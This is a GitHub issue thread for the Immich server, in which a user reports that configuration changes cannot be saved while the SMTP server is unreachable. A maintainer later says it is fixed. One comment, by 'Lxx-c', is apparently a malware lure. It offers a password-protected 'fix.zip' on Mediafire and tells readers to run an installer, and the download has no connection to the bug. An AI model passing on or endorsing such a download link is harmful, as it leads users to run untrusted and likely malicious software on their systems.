### ISSUE TITLE
Configuration save depends on working SMTP server

### ISSUE THREAD

**Issue by C-Otto** [immich-app/immich#12050]
### The bug

My SMTP (mail) setup currently is broken, which isn't an issue in itself. However, it seems Immich refuses to save the configuration because of this, even for unrelated changes like concurrency settings.

When I try to save my changes, I get this (after a few seconds):

Invalid SMTP configuration: Error: Connection timeout
(Immich Server Error)

I expect Immich to ignore the SMTP issue, or warn me about it, while still saving the (unrelated) changes.

### The OS that Immich Server is running on

Debian Stable

### Version of Immich Server

v1.112.1

### Platform with the issue

- [X] Server
- [ ] Web
- [ ] Mobile

### Reproduction steps

1. Configure SMTP and make sure it works
2. Shutdown SMTP server (so that Immich cannot use it anymore)
3. Update and save concurrency settings

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by C-Otto** [comment]
I fixed my mail setup which allowed me to save the concurrency settings.

**Comment by jrasm91** [comment]
Fixed in #12111
